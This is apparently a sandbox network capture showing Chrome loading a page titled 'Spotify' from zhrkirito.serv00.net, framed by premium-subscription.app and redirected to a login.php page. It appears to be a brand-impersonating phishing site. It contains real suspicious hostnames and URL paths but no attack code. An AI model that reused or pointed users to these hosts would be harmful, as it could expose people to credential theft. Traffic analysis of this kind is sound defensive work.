                                                                                                                      2025-01-12 23:23:26 UTC1553INData Raw: 36 30 35 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0a 20 20 20 3c 68 65 61 64 3e 0a 09 20 20 20 3c 74 69 74 6c 65 3e 53 70 6f 74 69 66 79 3c 2f 74 69 74 6c 65 3e 0a 09 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2d 30 30 2e 69 63 6f 6e 64 75 63 6b 2e 63 6f 6d 2f 61 73 73 65 74 73 2e 30 30 2f 73 70 6f 74 69 66 79 2d 69 63 6f 6e 2d 32 30 34 38 78 32 30 34 38 2d 6e 33 69 6d 79 70 38 65 2e 70 6e 67 22 3e 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63
                                                                                                                      Data Ascii: 605<html lang="en" class="no-js"> <head> <title>Spotify</title> <link rel="icon" href="https://static-00.iconduck.com/assets.00/spotify-icon-2048x2048-n3imyp8e.png"> <meta charset="utf-8"> <meta name="viewport" content="width=devic


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      3192.168.2.449745128.204.223.984432416C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2025-01-12 23:23:28 UTC702OUTGET /spotify/app HTTP/1.1
                                                                                                                      Host: zhrkirito.serv00.net
                                                                                                                      Connection: keep-alive
                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                      Upgrade-Insecure-Requests: 1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                      Sec-Fetch-Mode: navigate
                                                                                                                      Sec-Fetch-Dest: iframe
                                                                                                                      Referer: https://premium-subscription.app/
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      2025-01-12 23:23:29 UTC224INHTTP/1.1 301 Moved Permanently
                                                                                                                      Server: nginx
                                                                                                                      Date: Sun, 12 Jan 2025 23:23:29 GMT
                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                      Content-Length: 249
                                                                                                                      Connection: close
                                                                                                                      Location: https://zhrkirito.serv00.net/spotify/app/
                                                                                                                      2025-01-12 23:23:29 UTC249INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 7a 68 72 6b 69 72 69 74 6f 2e 73 65 72 76 30 30 2e 6e 65 74 2f 73 70 6f 74 69 66 79 2f 61 70 70 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://zhrkirito.serv00.net/spotify/app/">here</a>.</p></body></html>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      4192.168.2.449746128.204.223.984432416C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2025-01-12 23:23:30 UTC703OUTGET /spotify/app/ HTTP/1.1
                                                                                                                      Host: zhrkirito.serv00.net
                                                                                                                      Connection: keep-alive
                                                                                                                      Upgrade-Insecure-Requests: 1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                      Sec-Fetch-Mode: navigate
                                                                                                                      Sec-Fetch-Dest: iframe
                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                      Referer: https://premium-subscription.app/
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      2025-01-12 23:23:30 UTC213INHTTP/1.1 302 Found
                                                                                                                      Server: nginx
                                                                                                                      Date: Sun, 12 Jan 2025 23:23:30 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Transfer-Encoding: chunked
                                                                                                                      Connection: close
                                                                                                                      X-Powered-By: PHP/8.1.31
                                                                                                                      location: auth/login.php
                                                                                                                      2025-01-12 23:23:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                      Data Ascii: 0


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      5192.168.2.449748128.204.223.984432416C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2025-01-12 23:23:31 UTC717OUTGET /spotify/app/auth/login.php HTTP/1.1
                                                                                                                      Host: zhrkirito.serv00.net
                                                                                                                      Connection: keep-alive
                                                                                                                      Upgrade-Insecure-Requests: 1
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                      Sec-Fetch-Mode: navigate
                                                                                                                      Sec-Fetch-Dest: iframe
                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                      Referer: https://premium-subscription.app/
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      2025-01-12 23:23:31 UTC184INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Sun, 12 Jan 2025 23:23:31 GMT
                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                      Transfer-Encoding: chunked
                                                                                                                      Connection: close
                                                                                                                      X-Powered-By: PHP/8.1.31
                                                                                                                      2025-01-12 23:23:31 UTC12277INData Raw: 31 66 62 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 57 65 6c 63 6f 6d 65 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 72 65 73 2f 61 70 70 2e 63 73 73 22 3e 0d 0a 3c 2f 68 65 61 64 3e 0d
                                                                                                                      Data Ascii: 1fb4<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no"> <title>Welcome</title> <link rel="stylesheet" href="res/app.css"></head>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      6192.168.2.449755104.17.24.144432416C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2025-01-12 23:23:32 UTC560OUTGET /ajax/libs/jquery/3.7.1/jquery.min.js HTTP/1.1
                                                                                                                      Host: cdnjs.cloudflare.com
                                                                                                                      Connection: keep-alive
                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                      Accept: */*
                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                      Referer: https://zhrkirito.serv00.net/
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      2025-01-12 23:23:32 UTC958INHTTP/1.1 200 OK
                                                                                                                      Date: Sun, 12 Jan 2025 23:23:32 GMT
                                                                                                                      Content-Type: application/javascript; charset=utf-8
                                                                                                                      Transfer-Encoding: chunked
                                                                                                                      Connection: close
                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                      Cache-Control: public, max-age=30672000
                                                                                                                      ETag: W/"64ed75bb-76fe"
                                                                                                                      Last-Modified: Tue, 29 Aug 2023 04:36:11 GMT
                                                                                                                      cf-cdnjs-via: cfworker/kv
                                                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                                                      Timing-Allow-Origin: *
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      CF-Cache-Status: HIT
                                                                                                                      Age: 178289
                                                                                                                      Expires: Fri, 02 Jan 2026 23:23:32 GMT
                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WHr51TOux5D3tuuIKvtCv287CTkFlhohZmiuxsTgdgqrxQo4kt4ru8M8bLrbDaSl3fOlo5frSX29DAubKi7ZkKxF%2FOsvZGkwuG9gpWsPQmg%2BN7gB1ooPYliO9L5vCh3x%2F1OFk2dF"}],"group":"cf-nel","max_age":604800}
                                                                                                                      NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                      Strict-Transport-Security: max-age=15780000
                                                                                                                      Server: cloudflare
                                                                                                                      CF-RAY: 9010e5198ff58cc0-EWR
                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                      2025-01-12 23:23:32 UTC411INData Raw: 37 62 66 32 0d 0a 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 37 2e 31 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f
                                                                                                                      Data Ascii: 7bf2/*! jQuery v3.7.1 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Erro
                                                                                                                      2025-01-12 23:23:32 UTC1369INData Raw: 6f 74 6f 74 79 70 65 4f 66 2c 61 65 3d 6f 65 2e 73 6c 69 63 65 2c 67 3d 6f 65 2e 66 6c 61 74 3f 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6f 65 2e 66 6c 61 74 2e 63 61 6c 6c 28 65 29 7d 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6f 65 2e 63 6f 6e 63 61 74 2e 61 70 70 6c 79 28 5b 5d 2c 65 29 7d 2c 73 3d 6f 65 2e 70 75 73 68 2c 73 65 3d 6f 65 2e 69 6e 64 65 78 4f 66 2c 6e 3d 7b 7d 2c 69 3d 6e 2e 74 6f 53 74 72 69 6e 67 2c 75 65 3d 6e 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2c 6f 3d 75 65 2e 74 6f 53 74 72 69 6e 67 2c 61 3d 6f 2e 63 61 6c 6c 28 4f 62 6a 65 63 74 29 2c 6c 65 3d 7b 7d 2c 76 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 22 6e 75 6d
                                                                                                                      Data Ascii: ototypeOf,ae=oe.slice,g=oe.flat?function(e){return oe.flat.call(e)}:function(e){return oe.concat.apply([],e)},s=oe.push,se=oe.indexOf,n={},i=n.toString,ue=n.hasOwnProperty,o=ue.toString,a=o.call(Object),le={},v=function(e){return"function"==typeof e&&"num
                                                                                                                      2025-01-12 23:23:32 UTC1369INData Raw: 65 2c 74 2c 65 29 7d 29 29 7d 2c 73 6c 69 63 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 61 65 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 29 7d 2c 66 69 72 73 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 65 71 28 30 29 7d 2c 6c 61 73 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 65 71 28 2d 31 29 7d 2c 65 76 65 6e 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 63 65 2e 67 72 65 70 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 28 74 2b 31 29 25 32 7d 29 29 7d 2c 6f 64 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74
                                                                                                                      Data Ascii: e,t,e)}))},slice:function(){return this.pushStack(ae.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},even:function(){return this.pushStack(ce.grep(this,function(e,t){return(t+1)%2}))},odd:function(){return t
                                                                                                                      2025-01-12 23:23:32 UTC1369INData Raw: 29 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 30 3b 69 66 28 63 28 65 29 29 7b 66 6f 72 28 6e 3d 65 2e 6c 65 6e 67 74 68 3b 72 3c 6e 3b 72 2b 2b 29 69 66 28 21 31 3d 3d 3d 74 2e 63 61 6c 6c 28 65 5b 72 5d 2c 72 2c 65 5b 72 5d 29 29 62 72 65 61 6b 7d 65 6c 73 65 20 66 6f 72 28 72 20 69 6e 20 65 29 69 66 28 21 31 3d 3d 3d 74 2e 63 61 6c 6c 28 65 5b 72 5d 2c 72 2c 65 5b 72 5d 29 29 62 72 65 61 6b 3b 72 65 74 75 72 6e 20 65 7d 2c 74 65 78 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3d 22 22 2c 72 3d 30 2c 69 3d 65 2e 6e 6f 64 65 54 79 70 65 3b 69 66 28 21 69 29 77 68 69 6c 65 28 74 3d 65 5b 72 2b 2b 5d 29 6e 2b 3d 63 65 2e 74 65 78 74 28 74 29 3b 72 65 74 75 72 6e 20 31 3d 3d 3d 69 7c 7c 31 31 3d
                                                                                                                      Data Ascii: )},each:function(e,t){var n,r=0;if(c(e)){for(n=e.length;r<n;r++)if(!1===t.call(e[r],r,e[r]))break}else for(r in e)if(!1===t.call(e[r],r,e[r]))break;return e},text:function(e){var t,n="",r=0,i=e.nodeType;if(!i)while(t=e[r++])n+=ce.text(t);return 1===i||11=
                                                                                                                      2025-01-12 23:23:32 UTC1369INData Raw: 74 61 69 6e 73 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 74 26 26 74 2e 70 61 72 65 6e 74 4e 6f 64 65 3b 72 65 74 75 72 6e 20 65 3d 3d 3d 6e 7c 7c 21 28 21 6e 7c 7c 31 21 3d 3d 6e 2e 6e 6f 64 65 54 79 70 65 7c 7c 21 28 65 2e 63 6f 6e 74 61 69 6e 73 3f 65 2e 63 6f 6e 74 61 69 6e 73 28 6e 29 3a 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 26 26 31 36 26 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 6e 29 29 29 7d 3b 76 61 72 20 66 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 78 38 30 2d 5c 75 46 46 46 46 5c 77 2d 5d 2f 67 3b 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 74 3f 22 5c 30 22 3d 3d 3d 65 3f 22
                                                                                                                      Data Ascii: tains=function(e,t){var n=t&&t.parentNode;return e===n||!(!n||1!==n.nodeType||!(e.contains?e.contains(n):e.compareDocumentPosition&&16&e.compareDocumentPosition(n)))};var f=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\x80-\uFFFF\w-]/g;function p(e,t){return t?"\0"===e?"
                                                                                                                      2025-01-12 23:23:32 UTC1369INData Raw: 7c 29 28 5c 5c 64 2a 29 6e 7c 29 22 2b 67 65 2b 22 2a 28 3f 3a 28 5b 2b 2d 5d 7c 29 22 2b 67 65 2b 22 2a 28 5c 5c 64 2b 29 7c 29 29 22 2b 67 65 2b 22 2a 5c 5c 29 7c 29 22 2c 22 69 22 29 2c 62 6f 6f 6c 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 28 3f 3a 22 2b 66 2b 22 29 24 22 2c 22 69 22 29 2c 6e 65 65 64 73 43 6f 6e 74 65 78 74 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 22 2b 67 65 2b 22 2a 5b 3e 2b 7e 5d 7c 3a 28 65 76 65 6e 7c 6f 64 64 7c 65 71 7c 67 74 7c 6c 74 7c 6e 74 68 7c 66 69 72 73 74 7c 6c 61 73 74 29 28 3f 3a 5c 5c 28 22 2b 67 65 2b 22 2a 28 28 3f 3a 2d 5c 5c 64 29 3f 5c 5c 64 2a 29 22 2b 67 65 2b 22 2a 5c 5c 29 7c 29 28 3f 3d 5b 5e 2d 5d 7c 24 29 22 2c 22 69 22 29 7d 2c 4e 3d 2f 5e 28 3f 3a 69 6e 70 75 74 7c 73 65 6c 65 63 74 7c 74 65 78 74 61
                                                                                                                      Data Ascii: |)(\\d*)n|)"+ge+"*(?:([+-]|)"+ge+"*(\\d+)|))"+ge+"*\\)|)","i"),bool:new RegExp("^(?:"+f+")$","i"),needsContext:new RegExp("^"+ge+"*[>+~]|:(even|odd|eq|gt|lt|nth|first|last)(?:\\("+ge+"*((?:-\\d)?\\d*)"+ge+"*\\)|)(?=[^-]|$)","i")},N=/^(?:input|select|texta
                                                                                                                      2025-01-12 23:23:32 UTC1369INData Raw: 29 29 29 7b 69 66 28 63 3d 74 2c 66 3d 65 2c 31 3d 3d 3d 70 26 26 28 78 2e 74 65 73 74 28 74 29 7c 7c 6d 2e 74 65 73 74 28 74 29 29 29 7b 28 66 3d 48 2e 74 65 73 74 28 74 29 26 26 55 28 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 65 29 3d 3d 65 26 26 6c 65 2e 73 63 6f 70 65 7c 7c 28 28 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 73 3d 63 65 2e 65 73 63 61 70 65 53 65 6c 65 63 74 6f 72 28 73 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 73 3d 53 29 29 2c 6f 3d 28 6c 3d 59 28 74 29 29 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 6f 2d 2d 29 6c 5b 6f 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 51 28 6c 5b 6f 5d 29 3b 63 3d 6c 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 72 65 74 75
                                                                                                                      Data Ascii: ))){if(c=t,f=e,1===p&&(x.test(t)||m.test(t))){(f=H.test(t)&&U(e.parentNode)||e)==e&&le.scope||((s=e.getAttribute("id"))?s=ce.escapeSelector(s):e.setAttribute("id",s=S)),o=(l=Y(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+Q(l[o]);c=l.join(",")}try{retu
                                                                                                                      2025-01-12 23:23:32 UTC1369INData Raw: 6c 65 6d 65 6e 74 26 26 28 72 3d 28 54 3d 6e 29 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2c 43 3d 21 63 65 2e 69 73 58 4d 4c 44 6f 63 28 54 29 2c 69 3d 72 2e 6d 61 74 63 68 65 73 7c 7c 72 2e 77 65 62 6b 69 74 4d 61 74 63 68 65 73 53 65 6c 65 63 74 6f 72 7c 7c 72 2e 6d 73 4d 61 74 63 68 65 73 53 65 6c 65 63 74 6f 72 2c 72 2e 6d 73 4d 61 74 63 68 65 73 53 65 6c 65 63 74 6f 72 26 26 79 65 21 3d 54 26 26 28 74 3d 54 2e 64 65 66 61 75 6c 74 56 69 65 77 29 26 26 74 2e 74 6f 70 21 3d 3d 74 26 26 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 75 6e 6c 6f 61 64 22 2c 4d 29 2c 6c 65 2e 67 65 74 42 79 49 64 3d 24 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 72 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 65 29 2e 69 64 3d 63 65 2e 65 78
                                                                                                                      Data Ascii: lement&&(r=(T=n).documentElement,C=!ce.isXMLDoc(T),i=r.matches||r.webkitMatchesSelector||r.msMatchesSelector,r.msMatchesSelector&&ye!=T&&(t=T.defaultView)&&t.top!==t&&t.addEventListener("unload",M),le.getById=$(function(e){return r.appendChild(e).id=ce.ex
                                                                                                                      2025-01-12 23:23:32 UTC1369INData Raw: 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 26 26 43 29 72 65 74 75 72 6e 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 43 6c 61 73 73 4e 61 6d 65 28 65 29 7d 2c 64 3d 5b 5d 2c 24 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 72 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 65 29 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 69 64 3d 27 22 2b 53 2b 22 27 20 68 72 65 66 3d 27 27 20 64 69 73 61 62 6c 65 64 3d 27 64 69 73 61 62 6c 65 64 27 3e 3c 2f 61 3e 3c 73 65 6c 65 63 74 20 69 64 3d 27 22 2b 53 2b 22 2d 5c 72 5c 5c 27 20 64 69 73 61 62 6c 65 64 3d 27 64 69 73 61 62 6c 65 64 27 3e 3c 6f 70 74 69 6f 6e 20 73 65 6c 65 63 74 65 64 3d 27 27 3e 3c 2f 6f 70 74 69 6f 6e 3e 3c 2f 73 65 6c 65 63 74 3e 22 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74
                                                                                                                      Data Ascii: ElementsByClassName&&C)return t.getElementsByClassName(e)},d=[],$(function(e){var t;r.appendChild(e).innerHTML="<a id='"+S+"' href='' disabled='disabled'></a><select id='"+S+"-\r\\' disabled='disabled'><option selected=''></option></select>",e.querySelect
                                                                                                                      2025-01-12 23:23:32 UTC1369INData Raw: 73 53 65 6c 65 63 74 6f 72 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 56 28 65 29 2c 43 26 26 21 68 5b 74 2b 22 20 22 5d 26 26 28 21 64 7c 7c 21 64 2e 74 65 73 74 28 74 29 29 29 74 72 79 7b 76 61 72 20 6e 3d 69 2e 63 61 6c 6c 28 65 2c 74 29 3b 69 66 28 6e 7c 7c 6c 65 2e 64 69 73 63 6f 6e 6e 65 63 74 65 64 4d 61 74 63 68 7c 7c 65 2e 64 6f 63 75 6d 65 6e 74 26 26 31 31 21 3d 3d 65 2e 64 6f 63 75 6d 65 6e 74 2e 6e 6f 64 65 54 79 70 65 29 72 65 74 75 72 6e 20 6e 7d 63 61 74 63 68 28 65 29 7b 68 28 74 2c 21 30 29 7d 72 65 74 75 72 6e 20 30 3c 49 28 74 2c 54 2c 6e 75 6c 6c 2c 5b 65 5d 29 2e 6c 65 6e 67 74 68 7d 2c 49 2e 63 6f 6e 74 61 69 6e 73 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e
                                                                                                                      Data Ascii: sSelector=function(e,t){if(V(e),C&&!h[t+" "]&&(!d||!d.test(t)))try{var n=i.call(e,t);if(n||le.disconnectedMatch||e.document&&11!==e.document.nodeType)return n}catch(e){h(t,!0)}return 0<I(t,T,null,[e]).length},I.contains=function(e,t){return(e.ownerDocumen


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      7192.168.2.449751128.204.223.984432416C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2025-01-12 23:23:32 UTC593OUTGET /spotify/app/auth/res/app.css HTTP/1.1
                                                                                                                      Host: zhrkirito.serv00.net
                                                                                                                      Connection: keep-alive
                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                      Accept: text/css,*/*;q=0.1
                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                      Sec-Fetch-Dest: style
                                                                                                                      Referer: https://zhrkirito.serv00.net/spotify/app/auth/login.php
                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                      2025-01-12 23:23:33 UTC226INHTTP/1.1 200 OK
                                                                                                                      Server: nginx
                                                                                                                      Date: Sun, 12 Jan 2025 23:23:33 GMT
                                                                                                                      Content-Type: text/css
                                                                                                                      Content-Length: 1957
                                                                                                                      Last-Modified: Sun, 22 Dec 2024 22:13:05 GMT
                                                                                                                      Connection: close
                                                                                                                      ETag: "67688ef1-7a5"
                                                                                                                      Accept-Ranges: bytes
